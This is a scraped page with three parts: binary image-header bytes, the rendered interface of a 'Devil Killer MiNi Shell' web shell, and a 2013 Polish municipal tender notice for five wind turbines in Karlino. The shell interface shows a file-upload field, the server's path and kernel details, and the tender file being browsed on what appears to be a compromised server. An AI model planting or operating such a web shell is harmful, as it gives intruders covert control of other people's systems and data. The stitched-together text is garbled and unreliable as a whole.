JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131119/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131119/470516-N-2013.html

<p class="kh_header"><b>Karlino: Wykonanie 5 turbin wiatrowych na terenie obiektów w Gminie Karlino tj.: hali widowiskowo-sportowej w Karlinie, świetlicy wiejskiej w Syrkowicach, świetlicy wiejskiej w Mierzynie, świetlicy w Zwartowie oraz Szkoły Podstawowej w Daszewie - III przetarg</b><br>
<b>Numer ogłoszenia: 470516 - 2013; data zamieszczenia: 19.11.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Karlino , Plac Jana Pawła II 6, 78-230 Karlino, woj. zachodniopomorskie, tel. 94 3117273, faks 94 3117410.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.karlino.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie 5 turbin wiatrowych na terenie obiektów w Gminie Karlino tj.: hali widowiskowo-sportowej w Karlinie, świetlicy wiejskiej w Syrkowicach, świetlicy wiejskiej w Mierzynie, świetlicy w Zwartowie oraz Szkoły Podstawowej w Daszewie - III przetarg.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest Wykonanie 5 turbin wiatrowych na terenie obiektów w Gminie Karlino tj.: hali widowiskowo-sportowej w Karlinie, świetlicy wiejskiej w Syrkowicach, świetlicy wiejskiej w Mierzynie, świetlicy wiejskiej w Zwartowie oraz Szkoły Podstawowej w Daszewie oraz bezpłatny serwis i przeglądy techniczne w okresie 5 lat, w tym:
4.3.1.	Wykonanie turbiny wiatrowej 20kW dla hali widowiskowo-sportowej przy ul. Kościuszki na działkach nr 142/7, 144/7 w Karlinie.
Zakres przedmiotu zamówienia obejmuje:
- dostawę, montaż, uruchomienie, odbiory oraz serwis fabrycznie nowej turbiny wiatrowej o mocy 1*20 kW,
- wykonanie fundamentu pod turbinę wiatrową,
- dostosowanie instalacji elektrycznej do potrzeb turbiny wiatrowej wraz z podłączeniem do sieci, 
- wykonanie i podłączenie kompletnej instalacji odgromowej,
- dokonanie rozruchu oraz przeprowadzenia testów ruchowych i końcowej kontroli zainstalowanej turbiny, sporządzenie i uzgodnienie z operatorem instrukcji współpracy elektrowni wiatrowej z siecią elektroenergetyczną Energa-Operator, uczestnictwo w próbach współpracy turbiny wiatrowej z siecią,
- dostawy części zamiennych wraz z montażem, zapewnienie na swój koszt pełnej obsługi serwisowej na cały okres gwarancyjny, wraz z wymianą elementów eksploatacyjnych oraz elementów uszkodzonych, uczestnictwo w przeglądach gwarancyjnych,
- dostawa i montaż układu pomiarowego, dzięki któremu będzie możliwość ubiegania się o potwierdzenie wyprodukowanej energii celem uzyskania Certyfikatów pochodzenia (tzw. liczniki zielonej energii), zastosowany układ pomiarowy musi być zgodny z wymaganiami określonymi w Instrukcji Ruchu i Eksploatacji Sieci Dystrybucyjnej ENERGA - OPERATOR SA oraz wykonanie zgodnie z załączonym projektem, po wykonaniu prac związanych z instalacją pomiaru Zielonej energii wykonawca zobowiązany jest do wystąpienia do ENERGA - OPERATOR SA Oddział w Koszalinie z wnioskiem o sprawdzenie zainstalowanego układu pomiarowego, 
- przeprowadzenie jednodniowego szkolenia dla przedstawiciela Zamawiającego z zakresu działania poszczególnych komponentów/systemów turbiny, na terenie budowy, po zakończeniu inwestycji i uruchomieniu turbiny,
- wykonanie tablicy informacyjnej, wg wzoru stanowiącego załącznik do SIWZ,
- wykonanie ogrodzenia panelowego 4m*5m - zabezpieczonego antykorozyjnie (ocynkowane ogniowo), odpornego na warunki atmosferyczne, zakotwiczone w fundamencie betonowym (szerokość fundamentu 300mm, wysokość min. 800mm), szerokość paneli 2500, wysokość paneli 2030, panel prosty o rozstawie drutów pionowe druty co 50mm, poziome co 200mm, pojedyncze druty pionowe 5 mm i podwójne druty poziome 6+6 mm, wielkość oczka: 5x20cm, długość słupków 2600mm, o wymiarach 60x40x2mm zamykane od góry daszkami z mrozoodpornego tworzywa sztucznego, furtka 1300mm w świetle przejścia, zamykana na kłódkę, wykonać zwieńczenie ogrodzenia siatką (daszek z siatki nad całym ogrodzonym terenem).

4.3.2.	Wykonanie turbiny wiatrowej o mocy 5kW dla budynku świetlicy wiejskiej w Mierzynie na działce nr 19/4.
Zakres przedmiotu zamówienia obejmuje:
- dostawę, montaż, uruchomienie, odbiory oraz serwis fabrycznie nowej turbiny wiatrowej o mocy 1*5 kW,
- wykonanie fundamentu pod turbinę wiatrową,
- dostosowanie instalacji elektrycznej do potrzeb turbiny wiatrowej wraz z podłączeniem do sieci, 
- wykonanie i podłączenie kompletnej instalacji odgromowej,
- dokonanie rozruchu oraz przeprowadzenia testów ruchowych i końcowej kontroli zainstalowanej turbiny, sporządzenie i uzgodnienie z operatorem instrukcji współpracy elektrowni wiatrowej z siecią elektroenergetyczną Energa-Operator, uczestnictwo w próbach współpracy turbiny wiatrowej z siecią;
- dostawy części zamiennych wraz z montażem, zapewnienie na swój koszt pełnej obsługi serwisowej na cały okres gwarancyjny, wraz z wymianą elementów eksploatacyjnych oraz elementów uszkodzonych, uczestnictwo w przeglądach gwarancyjnych,
- dostawa i montaż układu pomiarowego, dzięki któremu będzie możliwość ubiegania się o potwierdzenie wyprodukowanej energii celem uzyskania Certyfikatów pochodzenia (tzw. liczniki zielonej energii), zastosowany układ pomiarowy musi być zgodny z wymaganiami określonymi w Instrukcji Ruchu i Eksploatacji Sieci Dystrybucyjnej ENERGA - OPERATOR SA oraz wykonanie zgodnie z załączonym projektem, po wykonaniu prac związanych z instalacją pomiaru Zielonej energii wykonawca zobowiązany jest do wystąpienia do ENERGA - OPERATOR SA  Oddział w Koszalinie z wnioskiem o sprawdzenie zainstalowanego układu pomiarowego,
- przeprowadzenie jednodniowego szkolenia dla przedstawiciela Zamawiającego z zakresu działania poszczególnych komponentów/systemów turbiny, na terenie budowy, po zakończeniu inwestycji i  uruchomieniu turbiny,
- wykonanie tablicy informacyjnej, wg wzoru stanowiącego załącznik do SIWZ,
- wykonanie ogrodzenia panelowego 4m*5m- zabezpieczone antykorozyjnie (ocynkowane ogniowo), odporne na warunki atmosferyczne, zakotwiczone w fundamencie betonowym (szerokość fundamentu 300mm, wysokość min. 800mm), szerokość paneli 2500, wysokość paneli 2030, panel prosty o rozstawie drutów pionowe druty co 50mm, poziome co 200mm, pojedyncze druty pionowe 5 mm i podwójne druty poziome 6+6 mm, wielkość oczka: 5x20cm, długość słupków 2600mm, o wymiarach 60x40x2mm zamykane od góry daszkami 
z mrozoodpornego tworzywa sztucznego, furtka 1300mm w świetle przejścia, zamykana na kłódkę,   wykonać zwieńczenie ogrodzenia siatką (daszek z siatki nad całym ogrodzonym terenem).
4.3.3.	Wykonanie turbiny o mocy 5kW na budynku Szkoły Podstawowej w Daszewie na działce nr 51.	
Zakres przedmiotu zamówienia obejmuje:
- dostawę, montaż, uruchomienie, odbiory i serwis fabrycznie nowej turbiny wiatrowej o mocy 1*5 kW,
- wykonanie konstrukcji wsporczej stalowej nierdzewnej na dachu pod turbinę, 
- dostosowanie instalacji elektrycznej do potrzeb turbiny wiatrowej wraz z podłączeniem do sieci, wykonanie i podłączenie kompletnej instalacji odgromowej,
- dokonanie rozruchu oraz przeprowadzenia testów ruchowych i końcowej kontroli zainstalowanej turbiny, sporządzenie i uzgodnienie z operatorem instrukcji współpracy elektrowni wiatrowej z siecią elektroenergetyczną Energa-Operator, uczestnictwo w próbach współpracy turbiny wiatrowej z siecią;
- dostawy części zamiennych wraz z montażem, zapewnienie na swój koszt pełnej obsługi serwisowej na cały okres gwarancyjny, wraz z wymianą elementów eksploatacyjnych oraz elementów uszkodzonych, uczestnictwo w przeglądach gwarancyjnych,
- dostawa i montaż układu pomiarowego, dzięki któremu będzie możliwość ubiegania się o potwierdzenie wyprodukowanej energii celem uzyskania Certyfikatów pochodzenia (tzw. liczniki zielonej energii), zastosowany układ pomiarowy musi być zgodny z wymaganiami określonymi w Instrukcji Ruchu i Eksploatacji Sieci Dystrybucyjnej ENERGA - OPERATOR SA oraz wykonanie zgodnie z załączonym projektem, po wykonaniu prac związanych z instalacją pomiaru Zielonej energii wykonawca zobowiązany jest do wystąpienia do ENERGA - OPERATOR SA  Oddział w Koszalinie z wnioskiem o sprawdzenie zainstalowanego układu pomiarowego,
- przeprowadzenie jednodniowego szkolenia dla przedstawiciela Zamawiającego z zakresu działania poszczególnych komponentów/systemów turbiny, na terenie budowy, po zakończeniu inwestycji i uruchomieniu turbiny),
- wykonanie tablicy informacyjnej, wg wzoru stanowiącego załącznik do SIWZ,

4.3.4.	Wykonanie turbiny wiatrowej o mocy 5kW dla budynku świetlicy wiejskiej w Syrkowicach na działce nr 20/9.	
Zakres przedmiotu zamówienia obejmuje:
- dostawę, montaż, uruchomienie, odbiory i serwis fabrycznie nowej turbiny wiatrowej o mocy 1*5 kW,
- wykonanie fundamentu pod turbinę wiatrową,
- dostosowanie instalacji elektrycznej do potrzeb turbiny wiatrowej wraz z podłączeniem do sieci, wykonanie i podłączenie kompletnej instalacji odgromowej,
- dokonanie rozruchu oraz przeprowadzenia testów ruchowych i końcowej kontroli zainstalowanej turbiny, sporządzenie i uzgodnienie z operatorem instrukcji współpracy elektrowni wiatrowej z siecią elektroenergetyczną Energa-Operator, uczestnictwo w próbach współpracy turbiny wiatrowej z siecią;
- dostawy części zamiennych wraz z montażem, zapewnienie na swój koszt pełnej obsługi serwisowej na cały okres gwarancyjny, wraz z wymianą elementów eksploatacyjnych oraz elementów uszkodzonych, uczestnictwo w przeglądach gwarancyjnych,
- dostawa i montaż układu pomiarowego, dzięki któremu będzie możliwość ubiegania się o potwierdzenie wyprodukowanej energii celem uzyskania Certyfikatów pochodzenia (tzw. liczniki zielonej energii), zastosowany układ pomiarowy musi być zgodny z wymaganiami określonymi w Instrukcji Ruchu i Eksploatacji Sieci Dystrybucyjnej ENERGA - OPERATOR SA oraz wykonanie zgodnie z załączonym projektem, po wykonaniu prac związanych z instalacją pomiaru Zielonej energii wykonawca zobowiązany jest do wystąpienia do ENERGA - OPERATOR SA  Oddział w Koszalinie z wnioskiem o sprawdzenie zainstalowanego układu pomiarowego,
- przeprowadzenie jednodniowego szkolenia dla przedstawiciela Zamawiającego z zakresu działania poszczególnych komponentów/systemów turbiny, na terenie budowy, po zakończeniu inwestycji (po uruchomieniu),
- wykonanie tablicy informacyjnej, wg wzoru stanowiącego załącznik do SIWZ,
- wykonanie ogrodzenia panelowego 4m*5m- zabezpieczone antykorozyjnie (ocynkowane ogniowo), odporne na warunki atmosferyczne, zakotwiczone w fundamencie betonowym (szerokość fundamentu 300mm, wysokość min. 800mm), szerokość paneli 2500, wysokość paneli 2030, panel prosty o rozstawie drutów pionowe druty co 50mm, poziome co 200mm, pojedyncze druty pionowe 5 mm i podwójne druty poziome 6+6 mm, wielkość oczka: 5x20cm, długość słupków 2600mm, o wymiarach 60x40x2mm zamykane od góry daszkami 
z mrozoodpornego tworzywa sztucznego, furtka 1300mm w świetle przejścia, zamykana na kłódkę,   wykonać zwieńczenie ogrodzenia siatką (daszek z siatki nad całym ogrodzonym terenem).

4.3.5.	Wykonanie turbiny wiatrowej o mocy 5kW dla budynku świetlicy wiejskiej w Zwartowie na działce nr  45 i 40.	
Zakres przedmiotu zamówienia obejmuje:
- dostawę, montaż, uruchomienie, odbiory i serwis fabrycznie nowej turbiny wiatrowej o mocy 1*5 kW,
- wykonanie fundamentu pod turbinę wiatrową,
- dostosowanie instalacji elektrycznej do potrzeb turbiny wiatrowej wraz z podłączeniem do sieci, wykonanie i podłączenie kompletnej instalacji odgromowej,
- dokonanie rozruchu oraz przeprowadzenia testów ruchowych i końcowej kontroli zainstalowanej turbiny, sporządzenie i uzgodnienie z operatorem instrukcji współpracy elektrowni wiatrowej z siecią elektroenergetyczną Energa-Operator, uczestnictwo w próbach współpracy turbiny wiatrowej z siecią;
- dostawy części zamiennych wraz z montażem, zapewnienie na swój koszt pełnej obsługi serwisowej na cały okres gwarancyjny, wraz z wymianą elementów eksploatacyjnych oraz elementów uszkodzonych, uczestnictwo w przeglądach gwarancyjnych,
- dostawa i montaż układu pomiarowego, dzięki któremu będzie możliwość ubiegania się o potwierdzenie wyprodukowanej energii celem uzyskania Certyfikatów pochodzenia (tzw. liczniki zielonej energii), zastosowany układ pomiarowy musi być zgodny z wymaganiami określonymi w Instrukcji Ruchu i Eksploatacji Sieci Dystrybucyjnej ENERGA - OPERATOR SA oraz wykonanie zgodnie z załączonym projektem, po wykonaniu prac związanych z instalacją pomiaru Zielonej energii wykonawca zobowiązany jest do wystąpienia do ENERGA - OPERATOR SA  Oddział w Koszalinie z wnioskiem o sprawdzenie zainstalowanego układu pomiarowego,
- przeprowadzenie 1 dniowego szkolenia dla przedstawiciela Zamawiającego z zakresu działania poszczególnych komponentów/systemów turbiny, na terenie budowy, po zakończeniu inwestycji (po uruchomieniu),
- wykonanie tablicy informacyjnej, wg wzoru stanowiącego załącznik do SIWZ,
- wykonanie ogrodzenia panelowego 4m*5m - zabezpieczone antykorozyjnie (ocynkowane ogniowo), odporne na warunki atmosferyczne, zakotwiczone w fundamencie betonowym (szerokość fundamentu 300mm, wysokość min. 800mm), szerokość paneli 2500, wysokość paneli 2030, panel prosty o rozstawie drutów pionowe druty co 50mm, poziome co 200mm, pojedyncze druty pionowe 5 mm i podwójne druty poziome 6+6 mm, wielkość oczka: 5x20cm, długość słupków 2600mm, o wymiarach 60x40x2mm zamykane od góry daszkami 
z mrozoodpornego tworzywa sztucznego, furtka 1300mm w świetle przejścia, zamykana na kłódkę,   wykonać zwieńczenie ogrodzenia siatką (daszek z siatki nad całym ogrodzonym terenem).

4.4.	Zamawiający wymaga aby w ramach umowy Wykonawca skalkulował bezpłatny serwis i przeglądy techniczne w okresie 5 lat (licząc od dnia podpisania protokołu odbioru końcowego bez uwag) na wszystkie zainstalowane urządzenia. Z tego tytułu w okresie 60 miesięcy serwis prowadzony będzie bezpłatnie przez Wykonawcę lub firmę specjalistyczną, z którą Wykonawca podpisze stosowną umowę. Zamawiający zastrzega konieczność przeprowadzenia raz w roku bezpłatnego przeglądu stanu działania układu z turbiną, a w przypadku awarii serwis gwarancyjny w przeciągu 24 h od terminu zgłoszenia awarii przez Zamawiającego.

4.5.	Szczegółowy opis przedmiotu zamówienia został określony w dokumentacji projektowej, specyfikacjach technicznych wykonania i odbioru robot oraz przedmiarach robót stanowiących Rozdział III niniejszej specyfikacji istotnych warunków zamówienia. 

Jeżeli w dokumentacji projektowej, specyfikacjach technicznych wykonania i odbioru robot lub przedmiarach robót podano nazwy materiałów, produktów lub urządzeń konkretnych systemów lub producentów to należy traktować to jedynie jako określenie pożądanego standardu i jakości. We wszystkich takich sytuacjach wykonawca może zaoferować równoważne materiały, produkty lub urządzenia. Jeżeli wykonawca powołuje się na rozwiązania równoważne opisywanym jest obowiązany wskazać, że oferowane dostawy i roboty budowlane spełniają wymagania określone przez zamawiającego.

Załączone przedmiary robót należy traktować, jako element pomocniczy. 
W przypadku jakichkolwiek braków lub niedoszacowanych ilości w przedmiarze poszczególnych robót, materiałów lub pracy sprzętu a zakres tych prac znajduje się 
w projekcie budowlanym, Wykonawca powinien skalkulować w swojej ofercie ilości niezbędne do wykonania przedmiotu zamówienia.  

4.6.	Wymagania dotyczące realizacji przedmiotu zamówienia.
Przedmiot zamówienia powinien zostać zrealizowany zgodnie z powszechnie obowiązującymi przepisami prawa i polskimi normami oraz zasadami wiedzy technicznej 
i sztuki budowlanej. Wykonawca będzie w szczególności zobowiązany do: 
1)	Prowadzenia robót zgodnie z przepisami BHP, p. poż. i ochrony środowiska;
2)	Prowadzenia robót związanych z wykonywaniem przedmiotu zamówienia w sposób pozwalający na korzystanie z obiektów użyteczności publicznej zgodnie z ich przeznaczeniem;
3)	Skompletowania wszystkich wyników badań, pomiarów, świadectw jakości, certyfikatów oraz kart gwarancyjnych przed zgłoszeniem robót do odbioru;
4)	Wykonania i dostarczenia na własny koszt w terminie do 5 dni przed terminem odbioru projektów powykonawczych, z zaznaczeniem ewentualnych zmian w stosunku 
do projektu, schematów, instrukcji, w tym bhp i p. poż.;
5)	Wykonania i dostarczenia Zamawiającemu po 4 egzemplarze geodezyjnej inwentaryzacji powykonawczej w wersji papierowej oraz 1 egzemplarz w wersji elektronicznej..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.31.53.00-1, 45.31.52.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 5.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wymagania dotyczące wadium
15.1.	Wykonawca jest zobowiązany do wniesienia wadium w wysokości:
	30.000,00 zł (słownie: trzydzieści tysięcy złotych).

15.2.	Wadium musi być wniesione przed upływem terminu składania ofert w jednej lub kilku formach:
1)	pieniądzu;
2)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, 
z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
3)	gwarancjach bankowych;
4)	gwarancjach ubezpieczeniowych;
5)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (t. j. Dz. U. z 2007 r. Nr 42, poz. 275, z późn. zm.).

15.3	Wadium wnoszone w pieniądzu winno być wpłacone na rachunek bankowy Zamawiającego: 45 8562 0007 0020 0064 2000 0100 w Banku Spółdzielczym 
w Karlinie. Za datę wniesienia wadium w pieniądzu uważa się termin uznania rachunku bankowego Zamawiającego.

15.4.	Wadium wniesione w innej formie niż pieniądz powinno zostać złożone zgodnie z powszechnie obowiązującymi przepisami prawa regulującymi ważność i skuteczność poszczególnych form w jakich może być wnoszone wadium. Zamawiający zaleca załączenie oryginału wadium do oferty w osobnym opakowaniu

15.5.	Wadium wnoszone przez konsorcjum w innej formie niż pieniądz może być wnoszone przez poszczególnych konsorcjantów. Ze złożonych dokumentów powinno wynikać, że wadium zabezpiecza ofertę wspólną.

15.6.	Zamawiający dokona zwrotu wadium w przypadkach i na zasadach określonych 
w ustawie.

15.7.	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca 
w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 ustawy, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie.

15.8.	Wykonawca, którego oferta zostanie wybrana utraci wadium wraz z odsetkami 
na rzecz Zamawiającego w przypadkach, gdy:
(1)	Odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;
(2)	Nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
(3)	Zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe 
z przyczyn leżących po stronie wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje tego warunku</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania spełniania warunku dotyczącego wiedzy i doświadczenia Wykonawca powinien wykazać, że w okresie ostatnich 5 lat przed dniem przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał co najmniej: 
(1)	1 robota budowlana polegającą na budowie turbiny wiatrowej o mocy nie mniejszej niż 20kW wraz z wykonaniem instalacji elektrycznej,
(1)	1 robota budowlana polegającą na budowie turbiny wiatrowej o mocy nie mniejszej niż 5kW wraz z wykonaniem instalacji elektrycznej, 

Zamawiający uzna spełnienie warunku dotyczącego wiedzy i doświadczenia, gdy wykonawca wykaże, że powyżej wskazane rodzaje prac zostały wykonane w ramach jednej umowy bądź kilku umów.
Przy analizie ofert pod względem spełniania warunków udziału w postępowaniu Zamawiający stosuje zasadę spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje tego warunku</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca powinien dysponować następującymi osobami zdolnymi do wykonania zamówienia:

na stanowisko kierownika budowy - co najmniej 1 osoba posiadająca: 
- uprawnienia budowlane do kierowania robotami w specjalności konstrukcyjno - budowlanej bez ograniczeń - zgodnie z rozporządzeniem  Ministra Transportu i Budownictwa z dnia 28 kwietnia 2006 r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. z 2006 r. Nr 83 poz. 578 z późn. zm.) lub odpowiadające im ważne uprawnienia wydane na podstawie wcześniej obowiązujących przepisów umożliwiające kierowanie robotami w zakresie przewidzianym opisem przedmiotu zamówienia; 
- doświadczenie zawodowe po uzyskaniu uprawnień obejmujące co najmniej  36 miesięcy przy realizacji robót budowlanych jako kierownik budowy lub kierownik robót (w rozumieniu art. 12 ust. 1 pkt.2 ustawy Prawo Budowlane), w tym co najmniej jednej roboty budowlanej polegającej na budowie i montażu turbin wiatrowych o mocy nie mniejszej niż 5kW.

na stanowisko kierownika robót elektrycznych- co najmniej 1 osoba posiadająca:
- uprawnienia budowlane do kierowania robotami w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń - zgodnie z rozporządzeniem Ministra Transportu i Budownictwa z dnia 28 kwietnia 2006 r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. z 2006 r. Nr 83 poz. 578 z późn. zm.) lub odpowiadające im ważne uprawnienia wydane na podstawie wcześniej obowiązujących przepisów umożliwiające kierowanie robotami w zakresie przewidzianym opisem przedmiotu zamówienia;
- doświadczenie zawodowe po uzyskaniu uprawnień obejmujące co najmniej 24 miesiące przy realizacji robót elektrycznych jako kierownik budowy lub kierownik robót 
(w rozumieniu art. 12 ust. 1 pkt.2 ustawy Prawo Budowlane).

